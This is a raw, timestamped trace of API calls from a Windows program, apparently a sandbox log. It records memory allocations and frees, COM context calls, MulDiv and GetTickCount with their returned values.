	[0084.741] realloc (_Block=0x0, _Size=0xa0) returned 0x482b40
	[0084.742] ??2@YAPEAX_K@Z () returned 0x30e780
	[0084.742] ??2@YAPEAX_K@Z () returned 0x482bf0
	[0084.742] realloc (_Block=0x0, _Size=0xc8) returned 0x482c20
	[0084.743] ??2@YAPEAX_K@Z () returned 0x482cf0
	[0084.743] malloc (_Size=0x1008) returned 0x4407f0
	[0084.743] ??2@YAPEAX_K@Z () returned 0x482d30
	[0084.744] ??2@YAPEAX_K@Z () returned 0x482bf0
	[0084.744] free (_Block=0x4407f0) 
	[0084.744] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.744] free (_Block=0x30ea80) 
	[0084.744] free (_Block=0x482d30) 
	[0084.744] free (_Block=0x441a10) 
	[0084.744] free (_Block=0x441800) 
	[0084.744] free (_Block=0x3082d0) 
	[0084.744] ??2@YAPEAX_K@Z () returned 0x482cf0
	[0084.744] ??2@YAPEAX_K@Z () returned 0x482d50
	[0084.745] ??2@YAPEAX_K@Z () returned 0x482c20
	[0084.745] ??2@YAPEAX_K@Z () returned 0x482e30
	[0084.745] malloc (_Size=0x18) returned 0x30ea80
	[0084.745] ??2@YAPEAX_K@Z () returned 0x482f10
	[0084.745] malloc (_Size=0x80) returned 0x4407f0
	[0084.745] malloc (_Size=0x108) returned 0x3082d0
	[0084.746] ??2@YAPEAX_K@Z () returned 0x440880
	[0084.746] malloc (_Size=0x80) returned 0x440930
	[0084.746] malloc (_Size=0x108) returned 0x3083e0
	[0084.747] realloc (_Block=0x0, _Size=0xc8) returned 0x4409c0
	[0084.747] ??2@YAPEAX_K@Z () returned 0x482ca0
	[0084.747] malloc (_Size=0x1008) returned 0x440a90
	[0084.747] ??2@YAPEAX_K@Z () returned 0x441aa0
	[0084.748] ??2@YAPEAX_K@Z () returned 0x441df0
	[0084.748] free (_Block=0x440a90) 
	[0084.748] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0084.748] free (_Block=0x441c50) 
	[0084.748] free (_Block=0x441aa0) 
	[0084.748] free (_Block=0x4422a0) 
	[0084.748] free (_Block=0x442090) 
	[0084.748] free (_Block=0x3084f0) 
	[0084.748] ??2@YAPEAX_K@Z () returned 0x440a90
	[0084.748] ??2@YAPEAX_K@Z () returned 0x440af0
	[0084.749] ??2@YAPEAX_K@Z () returned 0x440bd0
	[0084.750] malloc (_Size=0x30) returned 0x482ca0
	[0084.750] ??2@YAPEAX_K@Z () returned 0x440cb0
	[0084.750] malloc (_Size=0x18) returned 0x4409c0
	[0084.750] ??2@YAPEAX_K@Z () returned 0x4409e0
	[0084.750] malloc (_Size=0x80) returned 0x440d90
	[0084.750] malloc (_Size=0x108) returned 0x3084f0
	[0084.751] ??2@YAPEAX_K@Z () returned 0x440e20
	[0084.751] ??2@YAPEAX_K@Z () returned 0x440e90
	[0084.752] ??2@YAPEAX_K@Z () returned 0x440f10
	[0084.752] malloc (_Size=0x208) returned 0x440f90
	[0084.752] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0084.753] ??2@YAPEAX_K@Z () returned 0x441220
	[0084.754] ??2@YAPEAX_K@Z () returned 0x4412e0
	[0084.754] ??2@YAPEAX_K@Z () returned 0x441420
	[0084.754] ??2@YAPEAX_K@Z () returned 0x441560
	[0084.754] ??2@YAPEAX_K@Z () returned 0x4415f0
	[0084.754] ??2@YAPEAX_K@Z () returned 0x441680
	[0084.754] malloc (_Size=0x80) returned 0x441730
	[0084.754] malloc (_Size=0x108) returned 0x308600
	[0084.755] ??2@YAPEAX_K@Z () returned 0x4417c0
	[0084.755] ??2@YAPEAX_K@Z () returned 0x441870
	[0084.755] malloc (_Size=0x80) returned 0x441920
	[0084.755] malloc (_Size=0x108) returned 0x308710
	[0084.756] realloc (_Block=0x0, _Size=0x64) returned 0x4419b0
	[0084.756] realloc (_Block=0x0, _Size=0x2ac) returned 0x442090
	[0084.757] ??2@YAPEAX_K@Z () returned 0x442090
	[0084.758] ??2@YAPEAX_K@Z () returned 0x4419b0
	[0084.758] ??2@YAPEAX_K@Z () returned 0x441a60
	[0084.759] ??2@YAPEAX_K@Z () returned 0x441b10
	[0084.759] ??2@YAPEAX_K@Z () returned 0x442550
	[0084.760] malloc (_Size=0x80) returned 0x441bc0
	[0084.760] malloc (_Size=0x108) returned 0x308820
	[0084.761] ??2@YAPEAX_K@Z () returned 0x444520
	[0084.761] ??2@YAPEAX_K@Z () returned 0x444550
	[0084.762] ??2@YAPEAX_K@Z () returned 0x444580
	[0084.762] ??2@YAPEAX_K@Z () returned 0x4445b0
	[0084.930] ??2@YAPEAX_K@Z () returned 0x444ba0
	[0084.930] ??2@YAPEAX_K@Z () returned 0x444bd0
	[0084.931] ??2@YAPEAX_K@Z () returned 0x445550
	[0084.931] ??2@YAPEAX_K@Z () returned 0x445580
	[0084.932] ??2@YAPEAX_K@Z () returned 0x4455b0
	[0084.932] ??2@YAPEAX_K@Z () returned 0x4455e0
	[0084.933] ??2@YAPEAX_K@Z () returned 0x445610
	[0084.934] ??2@YAPEAX_K@Z () returned 0x445640
	[0084.937] ??2@YAPEAX_K@Z () returned 0x445670
	[0084.938] ??2@YAPEAX_K@Z () returned 0x4456a0
	[0084.940] ??2@YAPEAX_K@Z () returned 0x4456d0
	[0084.943] ??2@YAPEAX_K@Z () returned 0x445700
	[0084.945] ??2@YAPEAX_K@Z () returned 0x445730
	[0084.946] ??2@YAPEAX_K@Z () returned 0x445790
	[0084.949] ??2@YAPEAX_K@Z () returned 0x4457c0
	[0084.951] ??2@YAPEAX_K@Z () returned 0x4457f0
	[0084.953] ??2@YAPEAX_K@Z () returned 0x445820
	[0084.956] ??2@YAPEAX_K@Z () returned 0x445850
	[0084.957] ??2@YAPEAX_K@Z () returned 0x445880
	[0084.959] ??2@YAPEAX_K@Z () returned 0x4458b0
	[0084.962] ??2@YAPEAX_K@Z () returned 0x4458e0
	[0084.963] ??2@YAPEAX_K@Z () returned 0x445910
	[0085.060] ??2@YAPEAX_K@Z () returned 0x445940
	[0085.064] ??2@YAPEAX_K@Z () returned 0x445970
	[0085.066] ??2@YAPEAX_K@Z () returned 0x4459a0
	[0085.068] ??2@YAPEAX_K@Z () returned 0x4459d0
	[0085.070] ??2@YAPEAX_K@Z () returned 0x445a00
	[0085.072] ??2@YAPEAX_K@Z () returned 0x445a30
	[0085.074] ??2@YAPEAX_K@Z () returned 0x445a60
	[0085.077] ??2@YAPEAX_K@Z () returned 0x445a90
	[0085.078] ??2@YAPEAX_K@Z () returned 0x445ac0
	[0085.080] ??2@YAPEAX_K@Z () returned 0x445af0
	[0085.081] ??2@YAPEAX_K@Z () returned 0x445f60
	[0085.084] ??2@YAPEAX_K@Z () returned 0x445b20
	[0085.086] ??2@YAPEAX_K@Z () returned 0x445b50
	[0085.087] ??2@YAPEAX_K@Z () returned 0x445b80
	[0085.091] ??2@YAPEAX_K@Z () returned 0x445bb0
	[0085.093] ??2@YAPEAX_K@Z () returned 0x445be0
	[0085.094] ??2@YAPEAX_K@Z () returned 0x445c10
	[0085.097] ??2@YAPEAX_K@Z () returned 0x445c40
	[0085.099] ??2@YAPEAX_K@Z () returned 0x445c70
	[0085.101] ??2@YAPEAX_K@Z () returned 0x445ca0
	[0085.103] ??2@YAPEAX_K@Z () returned 0x445cd0
	[0085.105] ??2@YAPEAX_K@Z () returned 0x445d00
	[0085.193] ??2@YAPEAX_K@Z () returned 0x445d30
	[0085.196] ??2@YAPEAX_K@Z () returned 0x445d60
	[0085.198] ??2@YAPEAX_K@Z () returned 0x445d90
	[0085.199] ??2@YAPEAX_K@Z () returned 0x445dc0
	[0085.202] ??2@YAPEAX_K@Z () returned 0x445df0
	[0085.204] ??2@YAPEAX_K@Z () returned 0x445e20
	[0085.206] ??2@YAPEAX_K@Z () returned 0x445e50
	[0085.208] ??2@YAPEAX_K@Z () returned 0x445e80
	[0085.210] ??2@YAPEAX_K@Z () returned 0x445eb0
	[0085.212] ??2@YAPEAX_K@Z () returned 0x445ee0
	[0085.215] ??2@YAPEAX_K@Z () returned 0x445f10
	[0085.217] ??2@YAPEAX_K@Z () returned 0x446910
	[0085.219] ??2@YAPEAX_K@Z () returned 0x446940
	[0085.221] ??2@YAPEAX_K@Z () returned 0x446970
	[0085.223] ??2@YAPEAX_K@Z () returned 0x4469a0
	[0085.225] ??2@YAPEAX_K@Z () returned 0x4469d0
	[0085.228] ??2@YAPEAX_K@Z () returned 0x446a00
	[0085.229] ??2@YAPEAX_K@Z () returned 0x446a30
	[0085.436] ??2@YAPEAX_K@Z () returned 0x446a60
	[0085.437] ??2@YAPEAX_K@Z () returned 0x4470e0
	[0085.440] ??2@YAPEAX_K@Z () returned 0x446a90
	[0085.442] ??2@YAPEAX_K@Z () returned 0x446ac0
	[0085.443] ??2@YAPEAX_K@Z () returned 0x446af0
	[0085.444] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2277b8 | out: ppv=0x2277b8*=0x34f420) returned 0x0
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.446] free (_Block=0x441c70) 
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.446] free (_Block=0x30ea80) 
	[0085.446] free (_Block=0x440930) 
	[0085.446] free (_Block=0x3083e0) 
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.446] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] free (_Block=0x441e20) 
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] free (_Block=0x30ffb0) 
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] free (_Block=0x481140) 
	[0085.447] free (_Block=0x307d80) 
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0085.447] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0085.447] IUnknown:Release (This=0x34f420) returned 0x1
	[0085.447] GetTickCount () returned 0x25fbb
	[0085.450] ??2@YAPEAX_K@Z () returned 0x446b20
	[0085.451] ??2@YAPEAX_K@Z () returned 0x446b50
	[0085.453] ??2@YAPEAX_K@Z () returned 0x446b80
	[0085.456] ??2@YAPEAX_K@Z () returned 0x446bb0
	[0085.458] ??2@YAPEAX_K@Z () returned 0x446be0
	[0085.459] ??2@YAPEAX_K@Z () returned 0x446c10
	[0085.462] ??2@YAPEAX_K@Z () returned 0x446c40
	[0085.464] ??2@YAPEAX_K@Z () returned 0x446c70
	[0085.466] ??2@YAPEAX_K@Z () returned 0x446ca0
	[0085.469] ??2@YAPEAX_K@Z () returned 0x446cd0
	[0085.471] ??2@YAPEAX_K@Z () returned 0x446d00
	[0085.472] ??2@YAPEAX_K@Z () returned 0x446d30
	[0085.475] ??2@YAPEAX_K@Z () returned 0x446d60
	[0085.477] ??2@YAPEAX_K@Z () returned 0x446d90
	[0085.479] ??2@YAPEAX_K@Z () returned 0x446dc0
	[0085.685] ??2@YAPEAX_K@Z () returned 0x446df0
	[0085.687] ??2@YAPEAX_K@Z () returned 0x446e20
	[0085.689] ??2@YAPEAX_K@Z () returned 0x446e50
	[0085.691] ??2@YAPEAX_K@Z () returned 0x446e80
	[0085.693] ??2@YAPEAX_K@Z () returned 0x446eb0
	[0085.695] ??2@YAPEAX_K@Z () returned 0x446ee0
	[0085.698] ??2@YAPEAX_K@Z () returned 0x446f10
	[0085.699] ??2@YAPEAX_K@Z () returned 0x446f40
	[0085.701] ??2@YAPEAX_K@Z () returned 0x446f70
	[0085.704] ??2@YAPEAX_K@Z () returned 0x446fa0
	[0085.706] ??2@YAPEAX_K@Z () returned 0x446fd0
	[0085.707] ??2@YAPEAX_K@Z () returned 0x447000
	[0085.709] ??2@YAPEAX_K@Z () returned 0x447030
	[0085.710] ??2@YAPEAX_K@Z () returned 0x447060
	[0085.711] ??2@YAPEAX_K@Z () returned 0x447090
	[0085.713] ??2@YAPEAX_K@Z () returned 0x447a90
	[0085.714] ??2@YAPEAX_K@Z () returned 0x447ac0
	[0085.716] ??2@YAPEAX_K@Z () returned 0x447af0
	[0085.717] ??2@YAPEAX_K@Z () returned 0x447b20
	[0085.718] ??2@YAPEAX_K@Z () returned 0x447b50
	[0085.720] ??2@YAPEAX_K@Z () returned 0x447b80
	[0085.721] ??2@YAPEAX_K@Z () returned 0x447bb0
	[0085.723] ??2@YAPEAX_K@Z () returned 0x447be0
	[0085.723] ??2@YAPEAX_K@Z () returned 0x447c10
	[0085.724] ??2@YAPEAX_K@Z () returned 0x447c40
	[0085.724] ??2@YAPEAX_K@Z () returned 0x447c70
	[0085.725] ??2@YAPEAX_K@Z () returned 0x447ca0
	[0085.725] ??2@YAPEAX_K@Z () returned 0x447cd0
	[0085.726] ??2@YAPEAX_K@Z () returned 0x447d00
	[0085.727] ??2@YAPEAX_K@Z () returned 0x447d30
	[0085.727] ??2@YAPEAX_K@Z () returned 0x447d60
	[0085.728] ??2@YAPEAX_K@Z () returned 0x447d90
	[0085.728] ??2@YAPEAX_K@Z () returned 0x447dc0
	[0085.729] ??2@YAPEAX_K@Z () returned 0x447df0
	[0085.729] ??2@YAPEAX_K@Z () returned 0x447e20
	[0085.730] ??2@YAPEAX_K@Z () returned 0x447e50
	[0085.858] ??2@YAPEAX_K@Z () returned 0x447e80
	[0085.859] ??2@YAPEAX_K@Z () returned 0x447eb0
	[0085.860] ??2@YAPEAX_K@Z () returned 0x447ee0
	[0085.860] ??2@YAPEAX_K@Z () returned 0x447f10
	[0085.861] ??2@YAPEAX_K@Z () returned 0x447f40
	[0085.861] ??2@YAPEAX_K@Z () returned 0x447f70
	[0085.862] ??2@YAPEAX_K@Z () returned 0x447fa0
	[0085.864] ??2@YAPEAX_K@Z () returned 0x442600
	[0085.864] malloc (_Size=0x208) returned 0x481090
	[0085.864] ??2@YAPEAX_K@Z () returned 0x440e90
	[0085.865] ??2@YAPEAX_K@Z () returned 0x482bf0
	[0085.865] ??2@YAPEAX_K@Z () returned 0x440880
	[0085.866] ??2@YAPEAX_K@Z () returned 0x4426b0
	[0085.866] ??2@YAPEAX_K@Z () returned 0x442760
	[0085.866] malloc (_Size=0x80) returned 0x440910
	[0085.866] malloc (_Size=0x108) returned 0x307d80
	[0085.867] ??2@YAPEAX_K@Z () returned 0x442810
	[0085.867] malloc (_Size=0x80) returned 0x440a90
	[0085.867] malloc (_Size=0x108) returned 0x3083e0
	[0085.867] ??2@YAPEAX_K@Z () returned 0x448260
	[0085.868] ??2@YAPEAX_K@Z () returned 0x447fa0
	[0085.869] ??2@YAPEAX_K@Z () returned 0x4428c0
	[0085.869] ??2@YAPEAX_K@Z () returned 0x447fa0
	[0085.870] ??2@YAPEAX_K@Z () returned 0x447fd0
	[0085.870] ??2@YAPEAX_K@Z () returned 0x447fd0
	[0085.871] ??2@YAPEAX_K@Z () returned 0x448000
	[0085.872] ??2@YAPEAX_K@Z () returned 0x448030
	[0085.872] ??2@YAPEAX_K@Z () returned 0x448030
	[0085.873] ??2@YAPEAX_K@Z () returned 0x448060
	[0085.873] ??2@YAPEAX_K@Z () returned 0x448090
	[0085.874] ??2@YAPEAX_K@Z () returned 0x448090
	[0085.874] ??2@YAPEAX_K@Z () returned 0x4480c0
	[0085.875] ??2@YAPEAX_K@Z () returned 0x4480f0
	[0085.875] ??2@YAPEAX_K@Z () returned 0x4480f0
	[0085.876] ??2@YAPEAX_K@Z () returned 0x448120
	[0085.877] ??2@YAPEAX_K@Z () returned 0x448150
	[0085.877] ??2@YAPEAX_K@Z () returned 0x448150
	[0085.878] ??2@YAPEAX_K@Z () returned 0x448180
	[0085.878] ??2@YAPEAX_K@Z () returned 0x4481b0
	[0085.879] ??2@YAPEAX_K@Z () returned 0x4481b0
	[0085.879] ??2@YAPEAX_K@Z () returned 0x4481e0
	[0085.880] ??2@YAPEAX_K@Z () returned 0x448210
	[0085.880] ??2@YAPEAX_K@Z () returned 0x448210
	[0085.881] ??2@YAPEAX_K@Z () returned 0x448c10
	[0085.882] ??2@YAPEAX_K@Z () returned 0x448c40
	[0085.882] ??2@YAPEAX_K@Z () returned 0x448c40
	[0085.883] ??2@YAPEAX_K@Z () returned 0x448c70
	[0085.883] ??2@YAPEAX_K@Z () returned 0x448ca0
	[0085.884] ??2@YAPEAX_K@Z () returned 0x448ca0
	[0085.884] ??2@YAPEAX_K@Z () returned 0x448cd0
	[0085.885] ??2@YAPEAX_K@Z () returned 0x448d00
	[0085.886] ??2@YAPEAX_K@Z () returned 0x448d00
	[0085.886] ??2@YAPEAX_K@Z () returned 0x448d30
	[0085.887] ??2@YAPEAX_K@Z () returned 0x448d60
	[0085.887] ??2@YAPEAX_K@Z () returned 0x448d60
	[0085.888] ??2@YAPEAX_K@Z () returned 0x448d90
	[0085.888] ??2@YAPEAX_K@Z () returned 0x448dc0
	[0085.889] ??2@YAPEAX_K@Z () returned 0x448dc0
	[0085.890] ??2@YAPEAX_K@Z () returned 0x448df0
	[0085.890] ??2@YAPEAX_K@Z () returned 0x4493e0
	[0085.891] ??2@YAPEAX_K@Z () returned 0x448e20
	[0085.891] ??2@YAPEAX_K@Z () returned 0x448e20
	[0085.892] ??2@YAPEAX_K@Z () returned 0x448e50
	[0085.892] ??2@YAPEAX_K@Z () returned 0x448e80
	[0085.893] ??2@YAPEAX_K@Z () returned 0x448e80
	[0085.894] ??2@YAPEAX_K@Z () returned 0x448eb0
	[0085.894] ??2@YAPEAX_K@Z () returned 0x448ee0
	[0085.895] ??2@YAPEAX_K@Z () returned 0x448ee0
	[0085.895] ??2@YAPEAX_K@Z () returned 0x448f10
	[0085.896] ??2@YAPEAX_K@Z () returned 0x448f40
	[0085.896] ??2@YAPEAX_K@Z () returned 0x448f40
	[0085.897] ??2@YAPEAX_K@Z () returned 0x448f70
	[0085.897] ??2@YAPEAX_K@Z () returned 0x448fa0
	[0085.898] ??2@YAPEAX_K@Z () returned 0x448fa0
	[0085.899] ??2@YAPEAX_K@Z () returned 0x448fd0
	[0085.899] ??2@YAPEAX_K@Z () returned 0x449000
	[0085.900] ??2@YAPEAX_K@Z () returned 0x449000
	[0085.900] ??2@YAPEAX_K@Z () returned 0x449030
	[0085.901] ??2@YAPEAX_K@Z () returned 0x449060
	[0085.901] ??2@YAPEAX_K@Z () returned 0x449060
	[0085.977] ??2@YAPEAX_K@Z () returned 0x449090
	[0085.977] ??2@YAPEAX_K@Z () returned 0x4490c0
	[0085.978] ??2@YAPEAX_K@Z () returned 0x4490c0
	[0085.979] ??2@YAPEAX_K@Z () returned 0x4490f0
	[0085.979] ??2@YAPEAX_K@Z () returned 0x449120
	[0085.980] ??2@YAPEAX_K@Z () returned 0x449120
	[0085.981] ??2@YAPEAX_K@Z () returned 0x449150
	[0085.981] ??2@YAPEAX_K@Z () returned 0x449180
	[0085.982] ??2@YAPEAX_K@Z () returned 0x449180
	[0085.982] ??2@YAPEAX_K@Z () returned 0x4491b0
	[0085.983] ??2@YAPEAX_K@Z () returned 0x4491e0
	[0085.983] ??2@YAPEAX_K@Z () returned 0x4491e0
	[0085.984] ??2@YAPEAX_K@Z () returned 0x449210
	[0085.985] ??2@YAPEAX_K@Z () returned 0x449240
	[0085.985] ??2@YAPEAX_K@Z () returned 0x449240
	[0085.986] ??2@YAPEAX_K@Z () returned 0x449270
	[0085.986] ??2@YAPEAX_K@Z () returned 0x449d60
	[0085.987] ??2@YAPEAX_K@Z () returned 0x4492a0
	[0085.988] ??2@YAPEAX_K@Z () returned 0x4492a0
	[0085.988] ??2@YAPEAX_K@Z () returned 0x4492d0
	[0085.989] ??2@YAPEAX_K@Z () returned 0x449300
	[0085.989] ??2@YAPEAX_K@Z () returned 0x449300
	[0085.990] ??2@YAPEAX_K@Z () returned 0x449330
	[0085.990] ??2@YAPEAX_K@Z () returned 0x449360
	[0085.991] ??2@YAPEAX_K@Z () returned 0x449360
	[0085.992] ??2@YAPEAX_K@Z () returned 0x449390
	[0085.992] ??2@YAPEAX_K@Z () returned 0x44a710
	[0085.993] ??2@YAPEAX_K@Z () returned 0x44a710
	[0085.993] ??2@YAPEAX_K@Z () returned 0x44a740
	[0085.994] ??2@YAPEAX_K@Z () returned 0x44a770
	[0085.994] ??2@YAPEAX_K@Z () returned 0x44a770
	[0085.995] ??2@YAPEAX_K@Z () returned 0x44a7a0
	[0085.996] ??2@YAPEAX_K@Z () returned 0x44a7d0
	[0085.996] ??2@YAPEAX_K@Z () returned 0x44a7d0
	[0085.997] ??2@YAPEAX_K@Z () returned 0x44a800
	[0085.997] ??2@YAPEAX_K@Z () returned 0x44a830
	[0085.998] ??2@YAPEAX_K@Z () returned 0x44a830
	[0085.998] ??2@YAPEAX_K@Z () returned 0x44a860
	[0085.999] ??2@YAPEAX_K@Z () returned 0x44a890
	[0086.000] ??2@YAPEAX_K@Z () returned 0x44a890
	[0086.000] ??2@YAPEAX_K@Z () returned 0x44a8c0
	[0086.001] ??2@YAPEAX_K@Z () returned 0x44a8f0
	[0086.001] ??2@YAPEAX_K@Z () returned 0x44a8f0
	[0086.002] ??2@YAPEAX_K@Z () returned 0x44a920
	[0086.002] ??2@YAPEAX_K@Z () returned 0x44a950
	[0086.003] ??2@YAPEAX_K@Z () returned 0x44a950
	[0086.003] ??2@YAPEAX_K@Z () returned 0x44a980
	[0086.004] ??2@YAPEAX_K@Z () returned 0x44a9b0
	[0086.005] ??2@YAPEAX_K@Z () returned 0x44a9b0
	[0086.005] ??2@YAPEAX_K@Z () returned 0x44a9e0
	[0086.006] ??2@YAPEAX_K@Z () returned 0x44aa10
	[0086.006] ??2@YAPEAX_K@Z () returned 0x44aa10
	[0086.007] ??2@YAPEAX_K@Z () returned 0x44aa40
	[0086.007] ??2@YAPEAX_K@Z () returned 0x44aa70
	[0086.008] ??2@YAPEAX_K@Z () returned 0x44aa70
	[0086.009] ??2@YAPEAX_K@Z () returned 0x44aaa0
	[0086.009] ??2@YAPEAX_K@Z () returned 0x44aee0
	[0086.010] ??2@YAPEAX_K@Z () returned 0x44aad0
	[0086.010] ??2@YAPEAX_K@Z () returned 0x44aad0
	[0086.140] ??2@YAPEAX_K@Z () returned 0x44ab00
	[0086.141] ??2@YAPEAX_K@Z () returned 0x44ab30
	[0086.141] ??2@YAPEAX_K@Z () returned 0x44ab30
	[0086.142] ??2@YAPEAX_K@Z () returned 0x44ab60
	[0086.143] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0086.143] IUnknown:Release (This=0x34f420) returned 0x1
	[0086.143] GetTickCount () returned 0x2626a
	[0086.143] ??2@YAPEAX_K@Z () returned 0x447a90
	[0086.144] ??2@YAPEAX_K@Z () returned 0x447a90
	[0086.144] ??2@YAPEAX_K@Z () returned 0x447ac0
	[0086.145] ??2@YAPEAX_K@Z () returned 0x447af0
	[0086.145] ??2@YAPEAX_K@Z () returned 0x447af0
	[0086.146] ??2@YAPEAX_K@Z () returned 0x447b20
	[0086.147] ??2@YAPEAX_K@Z () returned 0x447b50
	[0086.147] ??2@YAPEAX_K@Z () returned 0x447b50
	[0086.148] ??2@YAPEAX_K@Z () returned 0x447b80
	[0086.148] ??2@YAPEAX_K@Z () returned 0x447bb0
	[0086.149] ??2@YAPEAX_K@Z () returned 0x447bb0
	[0086.149] ??2@YAPEAX_K@Z () returned 0x447be0
	[0086.150] ??2@YAPEAX_K@Z () returned 0x447c10
	[0086.151] ??2@YAPEAX_K@Z () returned 0x447c10
	[0086.151] ??2@YAPEAX_K@Z () returned 0x447c40
	[0086.152] ??2@YAPEAX_K@Z () returned 0x447c70
	[0086.153] ??2@YAPEAX_K@Z () returned 0x447c70
	[0086.153] ??2@YAPEAX_K@Z () returned 0x447ca0
	[0086.154] ??2@YAPEAX_K@Z () returned 0x447cd0
	[0086.154] ??2@YAPEAX_K@Z () returned 0x447cd0
	[0086.155] ??2@YAPEAX_K@Z () returned 0x447d00
	[0086.155] ??2@YAPEAX_K@Z () returned 0x447d30
	[0086.156] ??2@YAPEAX_K@Z () returned 0x447d30
	[0086.157] ??2@YAPEAX_K@Z () returned 0x447d60
	[0086.157] ??2@YAPEAX_K@Z () returned 0x447d90
	[0086.158] ??2@YAPEAX_K@Z () returned 0x447d90
	[0086.158] ??2@YAPEAX_K@Z () returned 0x447dc0
	[0086.159] ??2@YAPEAX_K@Z () returned 0x447df0
	[0086.159] ??2@YAPEAX_K@Z () returned 0x447df0
	[0086.160] ??2@YAPEAX_K@Z () returned 0x447e20
	[0086.160] ??2@YAPEAX_K@Z () returned 0x447e50
	[0086.161] ??2@YAPEAX_K@Z () returned 0x447e50
	[0086.162] ??2@YAPEAX_K@Z () returned 0x447e80
	[0086.162] ??2@YAPEAX_K@Z () returned 0x447eb0
	[0086.163] ??2@YAPEAX_K@Z () returned 0x447eb0
	[0086.163] ??2@YAPEAX_K@Z () returned 0x447ee0
	[0086.164] ??2@YAPEAX_K@Z () returned 0x447f10
	[0086.164] ??2@YAPEAX_K@Z () returned 0x447f10
	[0086.165] ??2@YAPEAX_K@Z () returned 0x447f40
	[0086.166] ??2@YAPEAX_K@Z () returned 0x447f70
	[0086.166] ??2@YAPEAX_K@Z () returned 0x447f70
	[0086.167] ??2@YAPEAX_K@Z () returned 0x44ab90
	[0086.168] ??2@YAPEAX_K@Z () returned 0x44abc0
	[0086.168] ??2@YAPEAX_K@Z () returned 0x44abc0
	[0086.169] ??2@YAPEAX_K@Z () returned 0x44abf0
	[0086.169] ??2@YAPEAX_K@Z () returned 0x44ac20
	[0086.170] ??2@YAPEAX_K@Z () returned 0x44ac20
	[0086.171] ??2@YAPEAX_K@Z () returned 0x44ac50
	[0086.171] ??2@YAPEAX_K@Z () returned 0x44ac80
	[0086.172] ??2@YAPEAX_K@Z () returned 0x44ac80
	[0086.172] ??2@YAPEAX_K@Z () returned 0x44acb0
	[0086.173] ??2@YAPEAX_K@Z () returned 0x44ace0
	[0086.173] ??2@YAPEAX_K@Z () returned 0x44ace0
	[0086.174] ??2@YAPEAX_K@Z () returned 0x44ad10
	[0086.174] ??2@YAPEAX_K@Z () returned 0x44ad40
	[0086.175] ??2@YAPEAX_K@Z () returned 0x44ad40
	[0086.176] ??2@YAPEAX_K@Z () returned 0x44ad70
	[0086.176] ??2@YAPEAX_K@Z () returned 0x44ada0
	[0086.177] ??2@YAPEAX_K@Z () returned 0x44ada0
	[0086.177] ??2@YAPEAX_K@Z () returned 0x44add0
	[0086.179] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0086.179] IUnknown:Release (This=0x34f420) returned 0x1
	[0086.179] GetTickCount () returned 0x26289
	[0086.181] realloc (_Block=0x0, _Size=0xc8) returned 0x441420
	[0086.980] ??2@YAPEAX_K@Z () returned 0x442a20
	[0086.980] malloc (_Size=0x80) returned 0x440b20
	[0086.981] malloc (_Size=0x108) returned 0x308930
	[0086.983] ??2@YAPEAX_K@Z () returned 0x480a20
	[0086.985] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0086.985] IUnknown:Release (This=0x34f420) returned 0x1
	[0086.985] GetTickCount () returned 0x265b4
	[0086.986] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0086.986] IUnknown:Release (This=0x34f420) returned 0x1
	[0086.986] GetTickCount () returned 0x265b4
	[0086.987] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0086.987] IUnknown:Release (This=0x34f420) returned 0x1
	[0086.987] GetTickCount () returned 0x265b4
	[0086.989] ??2@YAPEAX_K@Z () returned 0x453840
	[0086.991] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0086.996] ??2@YAPEAX_K@Z () returned 0x45a760
	[0086.998] ??2@YAPEAX_K@Z () returned 0x444520
	[0087.000] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0087.000] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.000] GetTickCount () returned 0x265c4
	[0087.003] malloc (_Size=0x208) returned 0x482cf0
	[0087.004] ??2@YAPEAX_K@Z () returned 0x4547e0
	[0087.005] ??2@YAPEAX_K@Z () returned 0x480a20
	[0087.008] ??2@YAPEAX_K@Z () returned 0x45aa00
	[0087.107] ??2@YAPEAX_K@Z () returned 0x4411a0
	[0087.108] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0087.108] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.108] GetTickCount () returned 0x26631
	[0087.110] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0087.110] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.110] GetTickCount () returned 0x26631
	[0087.110] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0087.110] IUnknown:Release (This=0x34f420) returned 0x1
	[0087.110] GetTickCount () returned 0x26631
	[0087.113] ??2@YAPEAX_K@Z () returned 0x452e00
	[0087.114] ??2@YAPEAX_K@Z () returned 0x480a20
	[0087.116] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
